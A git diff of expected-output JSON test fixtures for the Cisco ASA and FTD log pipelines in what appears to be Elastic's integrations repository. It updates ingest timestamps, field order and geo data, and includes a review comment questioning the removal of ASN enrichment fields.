CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17623,25 +17620,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605012300Z", + "ingested": "2021-12-14T14:37:05.575551739Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605015800Z", + "ingested": "2021-12-14T14:37:05.575552079Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17717,25 +17714,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605020400Z", + "ingested": "2021-12-14T14:37:05.575552485Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.605025600Z", + "ingested": "2021-12-14T14:37:05.575552824Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605029800Z", + "ingested": "2021-12-14T14:37:05.575553158Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605035300Z", + "ingested": "2021-12-14T14:37:05.575553498Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605040900Z", + "ingested": "2021-12-14T14:37:05.575554102Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605046300Z", + "ingested": "2021-12-14T14:37:05.575554525Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605052Z", + "ingested": "2021-12-14T14:37:05.575554860Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605057400Z", + "ingested": "2021-12-14T14:37:05.575555194Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605062800Z", + "ingested": "2021-12-14T14:37:05.575555542Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605068300Z", + "ingested": "2021-12-14T14:37:05.575555868Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605073700Z", + "ingested": "2021-12-14T14:37:05.575556196Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605079100Z", + "ingested": "2021-12-14T14:37:05.575556591Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605084400Z", + "ingested": "2021-12-14T14:37:05.575556917Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605089800Z", + "ingested": "2021-12-14T14:37:05.575557249Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605095300Z", + "ingested": "2021-12-14T14:37:05.575557592Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605100800Z", + "ingested": "2021-12-14T14:37:05.575557928Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605106300Z", + "ingested": "2021-12-14T14:37:05.575558262Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605112300Z", + "ingested": "2021-12-14T14:37:05.575558736Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605116Z", + "ingested": "2021-12-14T14:37:05.575559063Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605120300Z", + "ingested": "2021-12-14T14:37:05.575559393Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605125200Z", + "ingested": "2021-12-14T14:37:05.575559735Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605129700Z", + "ingested": "2021-12-14T14:37:05.575560062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605133300Z", + "ingested": "2021-12-14T14:37:05.575560400Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605137600Z", + "ingested": "2021-12-14T14:37:05.575560724Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605143100Z", + "ingested": "2021-12-14T14:37:05.575561056Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605148400Z", + "ingested": "2021-12-14T14:37:05.575561387Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605152Z", + "ingested": "2021-12-14T14:37:05.575561727Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605156200Z", + "ingested": "2021-12-14T14:37:05.575562052Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605159800Z", + "ingested": "2021-12-14T14:37:05.575562382Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605164400Z", + "ingested": "2021-12-14T14:37:05.575562718Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605169700Z", + "ingested": "2021-12-14T14:37:05.575563063Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605174Z", + "ingested": "2021-12-14T14:37:05.575563395Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605179400Z", + "ingested": "2021-12-14T14:37:05.575563717Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605184800Z", + "ingested": "2021-12-14T14:37:05.575564045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605190100Z", + "ingested": "2021-12-14T14:37:05.575564367Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605195600Z", + "ingested": "2021-12-14T14:37:05.575564692Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605201Z", + "ingested": "2021-12-14T14:37:05.575565035Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605206400Z", + "ingested": "2021-12-14T14:37:05.575565371Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605211800Z", + "ingested": "2021-12-14T14:37:05.575565704Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:20.605217200Z", + "ingested": "2021-12-14T14:37:05.575566036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json index 67caf248680..1aca74a162a 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json 
@@ -4,37 +4,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 145, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -43,15 +37,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
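Review bot: The regenerated expectation for the first DNS event drops the whole `destination.as` object (`"number": 20712` and `"organization": {"name": "Andrews \u0026 Arnold Ltd"}`) for 81.2.69.144, while the neighbouring geo fields merely get new values; the same removal repeats in every event of test-dns.log-expected.json in the later hunks. Nothing in the fixture says whether this is an artifact of a changed GeoIP/ASN test database in the test tooling or a loss of ASN enrichment in the ftd pipeline, and a regenerated expected file will accept either silently. If it is the database change, it is worth stating in the commit message so the disappearance of `destination.as.*` is not mistaken for a regression by the next reader; if it is not, the pipeline's ASN step needs a look before these expectations are accepted. Running the pipeline once against a live ASN database for this address would settle which case applies.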
@@ -90,7 +84,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096896200Z", + "ingested": "2021-12-14T14:37:39.593549919Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", @@ -153,37 +147,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -192,15 +180,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -239,7 +227,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096900400Z", + "ingested": "2021-12-14T14:37:39.593551882Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", 
@@ -304,37 +292,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -343,15 +325,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -390,7 +372,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096904600Z", + "ingested": "2021-12-14T14:37:39.593552298Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -453,37 +435,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "www.elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 200, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "www.elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -492,15 +468,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -539,7 +515,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096910500Z", + "ingested": "2021-12-14T14:37:39.593552639Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", 
@@ -604,37 +580,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -643,15 +613,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -690,7 +660,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096921600Z", + "ingested": "2021-12-14T14:37:39.593552990Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", @@ -754,37 +724,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { 